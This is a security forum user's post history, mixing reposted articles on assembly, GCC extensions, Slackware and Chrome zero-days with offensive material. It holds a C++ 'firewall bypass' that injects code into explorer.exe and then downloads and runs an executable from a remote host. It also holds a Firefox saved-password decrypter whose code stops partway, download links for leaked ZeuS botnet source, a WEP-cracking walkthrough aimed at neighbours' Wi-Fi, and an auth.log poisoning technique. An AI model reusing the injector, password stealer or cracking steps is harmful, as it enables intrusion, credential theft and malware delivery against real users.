Everything posted by Nytro
-
Assembly language for Penetration Testers

Below are useful resources for pentesters who want to learn assembly language as a start to exploit writing:

• Assembly - SkullSecurity
• Linux Assembly: Linux Assembly Programming From the Ground Up (Index of /releases/pgubook)
• Iczelion's Win32 Assembly Homepage
• Art of Assembly: Art of Assembly Language Programming and HLA by Randall Hyde (the first 5 chapters are enough)
• Intel Developer Manuals: Intel® 64 and IA-32 Architectures Software Developer's Manuals
• Assembly Language Primer for Hackers videos:
  - Assembly Primer for Hackers (Part 1) System Organization
  - Assembly Primer for Hackers (Part 2) Virtual Memory Organization
  - Assembly Primer for Hackers (Part 3) GDB Usage Primer
  - Assembly Primer for Hackers (Part 4) Hello World
  - Assembly Primer for Hackers (Part 5) Data Types
  - Assembly Primer for Hackers (Part 6) Moving Data
  - Assembly Primer for Hackers (Part 7) Working with Strings
  - Assembly Primer for Hackers (Part 8) Unconditional Branching
  - Assembly Primer for Hackers (Part 9) Conditional Branching
  - Assembly Primer for Hackers (Part 10) Functions
  - Assembly Primer for Hackers (Part 11) Functions Stack

Source: Assembley Language | Life of a Penetration Tester
-
To decrypt, or to crack hashes like md5?
-
I'll get there around 8.
-
They are trying to identify the author from the way he writes code. He appears to be a professional, of course... http://www.thehackernews.com/2011/05/fingerprinting-author-of-zeus-botnet.html
-
None. It presents some extensions of the GCC compiler that make life easier. Read at least part of the article. For example, you can write "1 ... 10" to stand for any number from 1 to 10. That is not possible in Visual C++, for instance, and it is NOT part of the C standard!
-
Local File Inclusion to Remote Command Execution using SSH
Nytro replied to Nytro's topic in Tutoriale in engleza
```text
nytro@rst:~$ ls -la /var/log/auth.log
-rw-r--r-- 1 syslog adm 1516 2011-05-12 17:20 /var/log/auth.log
```
I see it is "readable" by anyone...
-
GCC hacks in the Linux kernel
Discover GCC extensions for the C language
Skill Level: Intermediate
M. Tim Jones, Consultant Engineer, Emulex Corp
18 Nov 2008

The Linux® kernel uses several special capabilities of the GNU Compiler Collection (GCC) suite. These capabilities range from giving you shortcuts and simplifications to providing the compiler with hints for optimization. Discover some of these special GCC features and learn how to use them in the Linux kernel.

GCC and Linux are a great pair. Although they are independent pieces of software, Linux is totally dependent on GCC to enable it on new architectures. Linux further exploits features in GCC, called extensions, for greater functionality and optimization. This article explores many of these important extensions and shows you how they're used within the Linux kernel.

GCC in its current stable version (version 4.3.2) supports three versions of the C standard:
• The original International Organization for Standardization (ISO) standard of the C language (ISO C89 or C90)
• ISO C90 with amendment 1
• The current ISO C99 (the default standard that GCC uses and that this article assumes)

Note: This article assumes that you are using the ISO C99 standard. If you specify a standard older than the ISO C99 version, some of the extensions described in this article may be disabled. To specify the actual standard that GCC uses, you can use the -std option from the command line. Use the GCC manual to verify which extensions are supported in which versions of the standard (see Resources for a link).

Applicable versions
This article focuses on the use of GCC extensions in the 2.6.27.1 Linux kernel and version 4.3.2 of GCC. Each C extension refers to the file in the Linux kernel source where the example can be found.

The available C extensions can be classified in several ways. This article puts them in two broad categories:
• Functionality extensions bring new capabilities from GCC.
• Optimization extensions help you generate more efficient code.

Download: http://download.boulder.ibm.com/ibmdl/pub/software/dw/linux/l-gcc-hacks/l-gcc-hacks-pdf.pdf
Online: http://www.ibm.com/developerworks/linux/library/l-gcc-hacks/index.html
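The "1 ... 10" case-range extension that the reply above and the article refer to, as an added example (not code from the article or from the forum post): a byte classifier written once with GCC case ranges and once in ISO C, plus an exhaustive check that the two agree on all 256 byte values, which is the check to keep when the same source must also build with Visual C++ or another compiler without the extension.

```c
#include <stdio.h>

typedef enum { CLS_CONTROL, CLS_DIGIT, CLS_UPPER, CLS_LOWER, CLS_OTHER } byte_class;

/* Portable ISO C version: no case ranges, so each class is an explicit test. */
byte_class classify_iso(unsigned char b)
{
    if (b < 32 || b == 127)   return CLS_CONTROL;
    if (b >= '0' && b <= '9') return CLS_DIGIT;
    if (b >= 'A' && b <= 'Z') return CLS_UPPER;
    if (b >= 'a' && b <= 'z') return CLS_LOWER;
    return CLS_OTHER;
}

#if defined(__GNUC__)
/* Same classes using the GCC "case low ... high:" extension (inclusive range).
 * The spaces around "..." are required: "case 0...31" can be mis-tokenised. */
byte_class classify_gnu(unsigned char b)
{
    switch (b) {
    case 0 ... 31:
    case 127:         return CLS_CONTROL;
    case '0' ... '9': return CLS_DIGIT;
    case 'A' ... 'Z': return CLS_UPPER;
    case 'a' ... 'z': return CLS_LOWER;
    default:          return CLS_OTHER;
    }
}
#endif

/* Returns 1 if both implementations agree on every byte value. On a compiler
 * without the extension only the ISO version exists, so it trivially returns 1. */
int classifiers_agree(void)
{
#if defined(__GNUC__)
    int v;
    for (v = 0; v < 256; v++)
        if (classify_gnu((unsigned char)v) != classify_iso((unsigned char)v))
            return 0;
#endif
    return 1;
}

int main(void)
{
    const unsigned char sample[] = { 'A', 'b', '7', 0x01, '~' };  /* constructed input */
    static const char *names[] = { "control", "digit", "upper", "lower", "other" };
    size_t i;

    for (i = 0; i < sizeof sample; i++)
        printf("0x%02x -> %s\n", sample[i], names[classify_iso(sample[i])]);
    printf("GCC range version agrees with ISO version: %s\n",
           classifiers_agree() ? "yes" : "no");
    return 0;
}
```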
-
Slackware 13.37

It's true! Slackware 13.37 has been released. Nearly a year in the making, you will appreciate the performance and stability that can only come with careful and rigorous testing. Slackware 13.37 uses the 2.6.37.6 Linux kernel (hence our new $SLACKWARE_VERSION.$KERNEL_VERSION naming system used for this release ;-), and also ships with 2.6.38.4 kernels for those who want to run the latest (and also includes configuration files for 2.6.35.12 and 2.6.39-rc4). The long-awaited Firefox 4.0 web browser is included, the X Window System has been upgraded (and includes the open source nouveau driver for nVidia cards). The venerable Slackware installer has been improved as well, with support for installing to btrfs (for those who would like to try a new copy on write filesystem), a one-package-per-line display mode option, and alienBOB's big surprise: an easy to set up PXE install server that runs right off the DVD! More details may be found in the official announcement and in the release notes. For a complete list of included packages, see the package list.

Please consider supporting the Slackware project by picking up a copy of the Slackware 13.37 release from the Slackware Store. The discs are off to replication, but we're accepting pre-orders for the official 6 CD set and the DVD. The CD set is the 32-bit x86 release, while the DVD is a dual-sided disc with the 32-bit x86 release on one side and the 64-bit x86_64 release on the other. And, we still have T-shirts (coming soon, a limited edition 13.37 release commemorative black T-shirt with the classic Slackware logo on the front, and a "leet" LILO bootscreen on the back) and other Slackware stuff there, so have a look around.

Thanks to our subscribers and supporters for keeping Slackware going all these years. Thanks are again due to the Slackware crew, the developers of slackbuilds.org, the community on linuxquestions.org, Slackware IRC channels, and everyone else who helped out with this release.

Have fun, and enjoy the new stable release!
Pat and the Slackware crew

Oh, in case our web server that's rather short of RAM goes down, try this link: 1337 Error

Slackware 13.37 for ARM is also available. For details, see: start [slackware ARM]

Source: The Slackware Linux Project
-
Introduction to Network Security Toolkit (NST)

The Network Security Toolkit (NST) is an ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. The majority of tools published in the article Top 100 Security Tools by INSECURE.ORG are available in the toolkit.

Some of the tools available in this live CD are: Ntop, Wireshark, Nmap with the visualization tool Zenmap, and Kismet. Many tasks that can be performed within NST are available through a web interface called NST WUI. Among the tools that can be used through this interface are Nmap with the visualization tool Zenmap, Ntop, a session manager for VNC, a minicom-based terminal server, serial port monitoring, and WPA PSK management.

You can read some of my articles about Nmap and Ntop by following the links; for Nmap you also get Zenmap. Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.

NST also includes Nagios and Argus, two programs that can be used for network monitoring: you can check the status of various services, like a web server, a pop/imap mail server or other services that in general you can test directly with a network connection.

Another nice, and really "scenic", feature is that NST includes visualization of ntop, wireshark, traceroute and kismet data by geocoding the host addresses and displaying them via Google Earth. For this NST uses a custom tool: nstgeolocate — Geolocate hosts obtained from an 'ntop' session or Geolocate IPv4 Address conversations from a network packet capture file on a Mercator World Map projection or Global imagery.

There is also a browser-based packet capture and protocol analysis system capable of monitoring up to four network interfaces using Wireshark, as well as a Snort-based intrusion detection system with a "collector" backend that stores incidents in a MySQL database. For web developers, there is also a JavaScript console with a built-in object library with functions that aid the development of dynamic web pages. A great guide on what is available on the live distro and how to use each tool is present on the official wiki.

Conclusions
This live CD is really filled with security tools and utilities, so it could be really useful for setting up, in a few minutes, a place from which you can do a security audit of a network or of some hosts. The option to put it on a virtual machine is also really interesting; on the wiki there is a good how-to on putting NST on VirtualBox. So in a few words: try and use it for your security audit, you'll be satisfied for sure.

Link: http://sourceforge.net/projects/nst/
Source (+video): » Linuxaria Introduction to Network Security Toolkit (NST)
-
-
Practical Android Attacks
Bas Alberts + Massimiliano Oldani, Immunity Inc.

Attack Surface
• Remote: gain access
  - Browser – WebKit
  - Phone – Telephony stack
• Local: elevate privileges
  - Kernel – Device drivers
  - Userland – Zygote, ADBd, udev, etc.

Download: https://www.immunityinc.com/infiltrate/presentations/Android_Attacks.odt.pdf
-
Local File Inclusion to Remote Command Execution using SSH
May 9th, 2011 at 21:15 by lanmaster53

Log poisoning has been used for years to upgrade local file inclusion vulnerabilities to remote command execution. In most cases, web server logs are used to execute such an attack. Most admins have become wise to the technique and do a decent job of preventing this. However, an equal amount of attention is not always paid to authentication logs.

I was recently attempting to exploit a LFI vulnerability on a pen test and was having no luck poisoning the web server logs. Previous scans of the target showed that an OpenSSH service was running. I took one last shot at the LFI vulnerability and below was the result.

I was shocked to find that auth.log was world readable. By default, OpenSSH makes an entry (consisting of the user name and other data) to auth.log for every authentication attempt made to the ssh daemon. Knowing this, I did some quick testing and found that I could inject php code into auth.log from the user name field of an ssh client by attempting to authenticate. The command took some time to get working right as bash requires finesse for processing special characters, but after some troubleshooting, I came up with the following:

One issue I encountered is that OpenSSH makes 3 entries containing the user name to auth.log for every authentication attempt. In the following example, only one authentication attempt was made, but, as you can see, it appears in the log 3 times. The injected command will run 3 times unless php execution is terminated after the 1st command. I did this above with the exit; command. The unfortunate side effect is that you have one chance to get this right. Otherwise, you have to wait until the log cycles before you can make another attempt.

Here is what the final product looked like with the addition of a pre-format tag for aesthetics.

Source: Local File Inclusion to Remote Command Execution using SSH « LaNMaSteR53.blog

Simple and efficient
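A defender-side check for the auth.log poisoning the post describes, as an added example (not code from the post or from the forum): it scans sshd log lines for a PHP open tag in the user-name field, counting the three entries one failed attempt produces, and flags the world-readable file mode the post found. The log lines, host name and addresses are constructed for the example, not taken from the page.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

#ifndef S_IROTH
#define S_IROTH 0004   /* "other" read bit, for platforms whose sys/stat.h lacks it */
#endif

/* Constructed sample: one failed SSH login whose user name carried a PHP
 * open tag (logged three times by OpenSSH, as the post notes), followed by
 * two ordinary entries. The tag body is a harmless comment. */
static const char *SAMPLE_AUTH_LOG =
    "May 12 17:20:01 rst sshd[2201]: Invalid user <?php /*marker*/ ?> from 10.0.0.5\n"
    "May 12 17:20:01 rst sshd[2201]: input_userauth_request: invalid user <?php /*marker*/ ?>\n"
    "May 12 17:20:03 rst sshd[2201]: Failed password for invalid user <?php /*marker*/ ?> from 10.0.0.5 port 51234 ssh2\n"
    "May 12 17:21:10 rst sshd[2210]: Accepted password for nytro from 10.0.0.7 port 51300 ssh2\n"
    "May 12 17:22:45 rst sshd[2215]: Invalid user admin from 10.0.0.9\n";

/* A line is suspicious when it is an sshd entry and the text after
 * "user " contains a PHP open tag. Returns 1 if suspicious, else 0. */
int line_is_poisoned(const char *line)
{
    const char *user;

    if (strstr(line, "sshd[") == NULL)
        return 0;
    user = strstr(line, "user ");
    if (user == NULL)
        return 0;
    user += strlen("user ");
    return strstr(user, "<?") != NULL ? 1 : 0;
}

/* Counts poisoned lines in a buffer holding whole log text. Over-long
 * lines are truncated to the local buffer before inspection. */
int count_poisoned_lines(const char *text)
{
    int count = 0;
    const char *p = text;
    char line[1024];

    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        count += line_is_poisoned(line);
        p = nl ? nl + 1 : p + strlen(p);
    }
    return count;
}

/* auth.log must not be readable by everyone, or an LFI on the same host can
 * include it. Takes an st_mode value; returns 1 when "other" can read it
 * (the -rw-r--r-- case shown in the thread), else 0. */
int mode_is_world_readable(unsigned int mode)
{
    return (mode & S_IROTH) ? 1 : 0;
}

int main(void)
{
    struct stat st;

    printf("poisoned lines in constructed sample: %d\n",
           count_poisoned_lines(SAMPLE_AUTH_LOG));
    /* On a live system, check the real file's mode as well. */
    if (stat("/var/log/auth.log", &st) == 0)
        printf("/var/log/auth.log world-readable: %s\n",
               mode_is_world_readable(st.st_mode) ? "yes (tighten to 0640)" : "no");
    return 0;
}
```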
-
NoVirusThanks File Governor
Easily unlock locked files and folders.

File Governor is an advanced program which allows for files and folders within the system to be unlocked so that normal file I/O operations can be completed when normally they would not be able to be due to operating system restrictions for files currently in use. Once a file or folder is unlocked you will be able to force-close the file's handle, rename, delete etc.

File Governor is compatible with the following 32-bit and 64-bit Microsoft Windows Operating Systems: Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7.

Features
• Compatible with 32 & 64 bit OS
• Copy File to a User-Specified Directory
• Explorer Context Menu
• No Kernel Driver Needed
• Rename File to a User-Specified Filename
• Search for Locked Files
• Terminate Processes
• Unload DLL
• Unlock ALL Locked Files
• Unlock Single File
• Very user-friendly GUI

Download: http://downloads.novirusthanks.org/files/filegovernor_setup.exe
Portable: http://downloads.novirusthanks.org/files/portables/filegovernor_portable.zip
Source: NoVirusThanks File Governor - Anti Rootkit and Anti Malware – Security Software and Services - NoVirusThanks
-
Finally Source code of ZeuS Botnet Version: 2.0.8.9 available for Download !

Download:
http://krash.in/real2/zeus.rar
http://www.multiupload.com/P8QUNF4YJN
Password: zeus

Source: Finally Source code of ZeuS Botnet Version: 2.0.8.9 available for Download ! ~ THN : The Hackers News

Alternative:
http://www.megaupload.com/?d=LTJR7DHO
https://rapidshare.com/files/461898687/ZeuS_2.0.8.9.zip
http://uploading.com/files/626ff4fc/ZeuS%2B2.0.8.9.zip/
-
Clickjacking Paper Paul Stone, a consultant at Context, has conducted research into Clickjacking and produced a white paper which was premiered at Black Hat 2010, in a talk of the same title – Next Generation Clickjacking. Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe. Although it has been two years since the concept was first introduced, most websites still have not implemented effective protection against clickjacking. In part, this may be because of the difficulty of visualising how the technique works in practice. Download: http://www.contextis.com/resources/white-papers/clickjacking/Context-Clickjacking_white_paper.pdf
-
Two Zero Day Flaws Used To Bypass Google Chrome Security
May 10, 2011 | 02:02 PM
By Kelly Jackson Higgins, Dark Reading

French researchers say they hacked their way out of browser's sandbox, bypassed DEP and ASLR

Researchers at French firm VUPEN Security yesterday posted a video of a hack they say they executed using two zero-day vulnerabilities in Google's Chrome browser that successfully bypassed its sandbox and other security features. VUPEN, which withheld technical details of the bugs in its disclosure, had not disclosed the bugs or any details to Google as of this posting. The security firm provides details of vulnerabilities it discovers to its paying government customers.

"We did not publicly disclose any technical details of the vulnerabilities for security reasons. We did not send the technical details of the vulnerabilities to Google, and Google did not ask us to provide these details," says Chaouki Bekrar, CEO and head of research at VUPEN.

A Google spokesperson said in a statement that without any details on the hack, the company is unable to verify it. "We're unable to verify VUPEN's claims at this time as we have not received any details from them. Should any modifications become necessary, users will be automatically updated to the latest version of Chrome," the spokesperson said.

Chrome's sandbox feature, which runs an application in a restricted environment to protect the system, as well as the use of ASLR and DEP, had made the browser relatively impenetrable to hackers. Adobe also uses Chrome's sandboxing technology, but VUPEN's Bekrar says Adobe's software is not vulnerable to the new hack.

Bekrar says VUPEN employed two different bugs its researchers discovered: one that's exploited inside the sandbox, and one that's executed outside of it. "The first one results from a memory corruption leading to the execution of the first payload as low integrity level, inside the sandbox," he says. "A second payload is then used to exploit another vulnerability which allows the bypass of the sandbox and execution of the final payload with medium-integrity level, outside the sandbox."

The exploit, demonstrated here using Chrome v11.0.696.65 on Microsoft Windows 7 SP1 (x64), with the user being lured to visit a malware-rigged web page, also bypasses Microsoft's Address Space Layout Randomization (ASLR) security function and Data Execution Prevention (DEP) attack mitigation feature, and works on all Windows systems including Windows 7 Service Pack (SP) 1, Windows Vista SP2, and Windows XP SP3, according to Bekrar.

Microsoft's ASLR protects Windows from an exploit attempting to call a system function: it places code in random areas of memory that make it more difficult for an attacker to run malware on a machine. DEP prevents an exploit from directly injecting and executing code from sections of memory used for data. VUPEN Security early last year said it was able to bypass DEP on IE 8 and execute arbitrary code, and that it had sent its exploit code to Microsoft to examine.

Other vendors have demonstrated DEP and ASLR bypass attacks: Core Security Technologies discovered a flaw in Microsoft's Virtual PC hypervisor that can be used by an attacker to cheat DEP and ASLR. And independent researcher Peter Vreugdenhil at CanSecWest 2010 waged a heap overflow attack on IE 8 and used a zero-day vulnerability he discovered in the browser to bypass Windows 7's built-in anti-exploit features, Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR).

VUPEN's Bekrar says it took the researchers "many weeks" to find a way to bypass Chrome's sandbox. "Chrome has probably the most secure sandbox in the market, and it took us many weeks to find a way to bypass it," he says. "We have been looking into its whole attack surface and features to find a hole allowing the escape from the sandbox."

Anup Ghosh, founder and chief scientist at Invincea, says it's no surprise that the sandbox was hacked. "We always knew from the very beginning, while an internal sandbox is a good idea, architecturally, you've still got a lot of residual attack space within the browser," Ghosh says. "It's always just been a question of when it would happen."

And the hack highlights just how the sandbox, albeit an extra layer of security, is still just another piece of software that has vulnerabilities of its own, experts say. "Like other security features such as ASLR, sandboxes are very important as they make exploitation much harder and mitigate threats, however a sandbox is not unbreakable as it is itself a piece of software which can be affected by vulnerabilities," Bekrar says.

Invincea's Ghosh says he expects the vulnerabilities to be exploited -- initially by sophisticated attackers targeting specific organizations, and then eventually, by organized crime syndicates. "I have no doubt that this vulnerability will be exploited. The fact that they are not making it public makes it far more valuable," he says.

Meanwhile, there are no ways for Chrome users to protect themselves from these types of attacks.

Source: http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/229403161/two-zero-day-flaws-used-to-bypass-google-chrome-security.html
-
I forgot to mention the source; I have updated the first post.
-
How To Crack WEP using Backtrack w/Pictures
Author: Warlock

This tutorial is strictly educational, neither I, nor leetcoders is responsible for whatever trouble you may get into by using this method. Tinypic killed a couple of my images, I'm sure you can still manage to do it.

Welcome to my tutorial, by the end of this tutorial, you should be able to have cracked your (or your nearby neighbors) WEP encrypted wifi.

What you need:
• Backtrack 3 or 4 (In this tutorial I used 3, since I had it laying around). Which you can get here; Downloads
• A computer with a compatible wireless card (if you have a newer computer, this will most likely work on your machine)
• Patience

Assuming you've already downloaded backtrack, and burned it using your favorite burning software, restart your computer with the backtrack disc, since it can be used as a livecd.

First of all, before you do anything, navigate to the wireless assistant; Start>Internet>Wireless Assistant. If you do not see any networks, then this will not work for you.

Open the konsole, which is here; Now type, airmon-ng. It should show you your wireless card's info, like so;

Now type airmon-ng stop (your interface). Should show you this;

Now type ifconfig (your interface) down. Then type macchanger --mac 00:11:22:33:44:55 (your interface). This spoofs your mac address, so your victim cannot figure out who you are.

Type airodump-ng (your interface). This will open up a new konsole. Once you see the network you want to attack, press CTRL+C (This will stop your wireless card from searching for new networks).

Open a new konsole. Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface). Like so; It will open up yet another konsole. Now let it run for a few minutes (until it reaches about 5000 or so packets, the more the better chance of cracking it.) Go watch a video on youtube, or go on HF, any network activity will increase the amount of packets you pickup.

Open another konsole and type aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface). Type aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface). Let it run for about 5 minutes, while it collects the packets. Then press CTRL+C.

Now type aircrack-ng -b (bssid) (filename-01.cap). You have found the WEP key, mine being 77838557744334834238286364 (without the colons). And you're done!

~Warlock
Source: LeetCoders
-
FWB++
FWB++ example by r3l4x[] (FWB stands for Firewall Bypass)

```cpp
/* Coder:Anskya,r3l4x[] */
#pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078 /FILEALIGN:0x200")
#pragma comment(linker,"/OPT:NOWIN98 /BASE:0x13140000 /INCREMENTAL:NO")
#pragma comment(linker,"/ENTRY:Entrypoint /MERGE:.rdata=.text /MERGE:.data=.text")
#pragma comment(lib, "urlmon.lib")
#include <windows.h>
#include <urlmon.h>   // URLDownloadToFile

// Body of the thread that is started inside the target process.
unsigned long inject(void *)
{
    URLDownloadToFile(0, "htt://Www.Anskya.Net/Test.exe", "C:\\xx.exe", 0, 0);
    WinExec("C:\\xx.exe", SW_SHOW);
    ExitThread(0);
    return 0;
}

// Custom entry point (set with /ENTRY above, so there is no CRT main).
// The image is linked at a fixed base with a single writable+executable
// section so that a raw copy of it is usable at the same address in the
// process that owns the taskbar window (explorer.exe).
void Entrypoint()
{
    DWORD Size;
    PBYTE module;
    HANDLE process;
    DWORD PID;
    LPVOID NewModule;

    module = (PBYTE)GetModuleHandle(0);
    Size = ((PIMAGE_NT_HEADERS)(module + ((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage;
    GetWindowThreadProcessId(FindWindow("shell_traywnd", NULL), &PID);
    process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
    VirtualFreeEx(process, module, 0, MEM_RELEASE);
    NewModule = VirtualAllocEx(process, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(process, NewModule, module, Size, NULL);
    CreateRemoteThread(process, 0, 0, (unsigned long(__stdcall *)(void *))inject, module, 0, NULL);
}
```

Source: LeetCoders
-
Morphine Packer (C++ version)
Author: holyfather
This is a C/asm port of the original Delphi code.
Download: http://www.megaupload.com/?d=PU3FCSNN
Source: http://leetcoders.org/showthread.php?t=167
-
FF pass Decrypt
Firefox Password Decrypter by KriPpLer

```c
//-----------------------------------------------------------------------
////////////////////////////////////////////////////////////
// Description: Firefox Password Cache Decrypter
// Versions: Firefox 1, 2, and 3
// Author: KriPpLer
// Language: C
// Released: 9/9/2008
// URL: http://www.krippler.com/
///////////////////////////////////////////////////////////
// Credit: http://securityxploded.com/ (FF 2 Source)
// Original Source: http://nagmatrix.50webs.com/download/Firepassword_src.zip
////////////////////////////////////////////////////////////
//-----------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <userenv.h>
#pragma comment(lib,"userenv.lib")

//-----------------------------------------------------------------------
// Firefox internal SEC structures
typedef enum SECItemType {
    siBuffer = 0,
    siClearDataBuffer = 1,
    siCipherDataBuffer = 2,
    siDERCertBuffer = 3,
    siEncodedCertBuffer = 4,
    siDERNameBuffer = 5,
    siEncodedNameBuffer = 6,
    siAsciiNameString = 7,
    siAsciiString = 8,
    siDEROID = 9,
    siUnsignedInteger = 10,
    siUTCTime = 11,
    siGeneralizedTime = 12
} SECItemType;

typedef struct SECItem {
    SECItemType type;
    unsigned char *data;
    unsigned int len;
} SECItem;

typedef enum SECStatus {
    SECWouldBlock = -2,
    SECFailure = -1,
    SECSuccess = 0
} SECStatus;

//-----------------------------------------------------------------------
// Removes gecko-sdk dependency
#define PRBool int
#define PRUint32 unsigned int
#define PR_TRUE 1
#define PR_FALSE 0

// Mozilla library names
#define NSS_LIBRARY_NAME "nss3.dll"
#define PLC_LIBRARY_NAME "plc4.dll"
#define NSPR_LIBRARY_NAME "nspr4.dll"
#define SQLITE_LIBRARY_NAME "sqlite3.dll"
#define MOZCRT_LIBRARY_NAME "mozcrt19.dll"
#define NSSU_LIBRARY_NAME "nssutil3.dll"
#define PLDS_LIBRARY_NAME "plds4.dll"
#define SOFTN_LIBRARY_NAME "softokn3.dll"

#define LOADLIBRARY(x) LoadLibrary(x)
#define GETPROCADDRESS GetProcAddress
#define FREELIBRARY FreeLibrary

//-----------------------------------------------------------------------
// Read buffer for the signon file (an enum so the size is a constant in C too)
enum { buflen = 10240 };
static char readbuf[buflen + 1];
static int last = 0;
static int next = 0;

typedef struct PK11SlotInfoStr PK11SlotInfo;

// NSS Library functions (resolved at run time with GetProcAddress)
typedef SECStatus (*NSS_Init)(const char *configdir);
typedef SECStatus (*NSS_Shutdown)(void);
typedef PK11SlotInfo *(*PK11_GetInternalKeySlot)(void);
typedef void (*PK11_FreeSlot)(PK11SlotInfo *slot);
typedef SECStatus (*PK11_CheckUserPassword)(PK11SlotInfo *slot, char *pw);
typedef SECStatus (*PK11_Authenticate)(PK11SlotInfo *slot, PRBool loadCerts, void *wincx);
typedef SECStatus (*PK11SDR_Decrypt)(SECItem *data, SECItem *result, void *cx);

// PLC Library functions
typedef char *(*PL_Base64Decode)(const char *src, PRUint32 srclen, char *dest);

// Function declarations..
void NSSUnload();
int InitFFLibs(char *firefoxPath);
int InitializeNSSLibrary(char *profilePath);
int CheckMasterPassword(char *password);
int DirectoryExists(char *path);
void StrLwr(char *str);
int OpenFile(char *filePath);
void CloseFile();
int ReadLine(char *buffer, int size);
char *GetFFProfilePath();
char *GetFFLibPath();
char *GetFFVersion();
char **Explode(char *StrIn, const char *Delimiter);
char *Split(char *String, char Delimeter[], int Part);
char *replace(char *str, const char *substr, const char *repstr);
char ReadChar();
char Vers[_MAX_PATH] = "";
int version = 1;
int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen);
int Base64Decode(char *cryptData, char **decodeData, int *decodeLen);

//-----------------------------------------------------------------------
NSS_Init NSSInit = NULL;
NSS_Shutdown NSSShutdown = NULL;
PK11_GetInternalKeySlot PK11GetInternalKeySlot = NULL;
PK11_CheckUserPassword PK11CheckUserPassword = NULL;
PK11_FreeSlot PK11FreeSlot = NULL;
PK11_Authenticate PK11Authenticate = NULL;
PK11SDR_Decrypt PK11SDRDecrypt = NULL;
PL_Base64Decode PLBase64Decode = NULL;

int IsNSSInitialized = 0;
HMODULE libnss = NULL;
HMODULE libplc = NULL;
HMODULE libtmp = NULL;
FILE *signonFile = NULL;

//-----------------------------------------------------------------------
int OpenFile(char *filePath)
{
    last = next = 0;
    signonFile = fopen(filePath, "r");
    if (signonFile == NULL) {
        return 0; // fail
    }
    return 1;
}

//-----------------------------------------------------------------------
// Returns the next byte of the signon file, or 0 at end of file
char ReadChar()
{
    if (next >= last) {
        next = 0;
        last = fread(readbuf, 1, buflen, signonFile);
        if (last <= 0) {
            return 0;
        }
    }
    return readbuf[next++];
}

//-----------------------------------------------------------------------
int ReadLine(char *buffer, int size)
{
    unsigned int c;
    int strLength = 0, i = 0;

    buffer[0] = 0;
    while (1) {
        c = ReadChar();
        // eof reached
        if (c == 0) // || feof(file) )
            return 0;
        if (c == '\n') {
            if (strLength >= size)
                strLength = size - 1;
            buffer[strLength++] = 0;
            break;
        }
        if (c != '\r') {
            for (i = 0; i < 4 && ((c & 0xff) != 0); i++) {
                if (strLength >= size) {
                    printf("\n Buffer is insufficient to store data");
                    return 0;
                }
                buffer[strLength++] = (char)c;
                c = c >> 8;
            }
        }
    }
    return 1;
}

//-----------------------------------------------------------------------
// Misc functions
int DirectoryExists(char *path)
{
    DWORD attr = GetFileAttributes(path);
    // attr is unsigned, so the original "attr < 0" test never fired;
    // INVALID_FILE_ATTRIBUTES is the documented failure value
    if ((attr == INVALID_FILE_ATTRIBUTES) || !(attr & FILE_ATTRIBUTE_DIRECTORY)) {
        return 0;
    }
    return 1;
}

//-----------------------------------------------------------------------
void StrLwr(char *str)
{
    int n = strlen(str);
    for (int i = 0; i < n; i++) {
        if (str[i] >= 65 && str[i] <= 90)
            str[i] += 32;
    }
}

//-----------------------------------------------------------------------
// Loads the specified Firefox library with the given ffdir path as root.
// (Renamed from LoadLibrary so it no longer overloads the Win32 function.)
HMODULE LoadFFLibrary(char *firefoxDir, char *libName)
{
    char loadPath[4096] = "";

    strcpy(loadPath, firefoxDir);
    strcat(loadPath, "/");
    strcat(loadPath, libName);
    libtmp = LOADLIBRARY(loadPath);
    if (!libtmp) {
        return 0; // Failed to load library
    }
    return libtmp;
}

//-----------------------------------------------------------------------
int InitFFLibs(char *FFDir)
{
    libnss = libplc = NULL;

    // Load all required dll's
    if (FFDir != NULL) {
        // Minor version check: mozcrt19.dll exists for Firefox 3 only; on
        // version 2 or lower the NSSU and SQLite libraries are not present
        if (LoadFFLibrary(FFDir, MOZCRT_LIBRARY_NAME)) {
            if (LoadFFLibrary(FFDir, NSPR_LIBRARY_NAME) && LoadFFLibrary(FFDir, PLDS_LIBRARY_NAME)
                && LoadFFLibrary(FFDir, PLC_LIBRARY_NAME) && LoadFFLibrary(FFDir, NSSU_LIBRARY_NAME))
                LoadFFLibrary(FFDir, SQLITE_LIBRARY_NAME);
        }
        // Common to all versions (dependencies first, nss3 last)
        if (LoadFFLibrary(FFDir, NSPR_LIBRARY_NAME) && LoadFFLibrary(FFDir, PLDS_LIBRARY_NAME)
            && (libplc = LoadFFLibrary(FFDir, PLC_LIBRARY_NAME)) != NULL
            && LoadFFLibrary(FFDir, SOFTN_LIBRARY_NAME)) {
            libnss = LoadFFLibrary(FFDir, NSS_LIBRARY_NAME);
            if (libnss)
                printf("\n\n Libraries loaded from master firefox path successfully");
        }
    }

    // Now load from current path.
    if (!libnss) {
        libnss = LOADLIBRARY(NSS_LIBRARY_NAME);
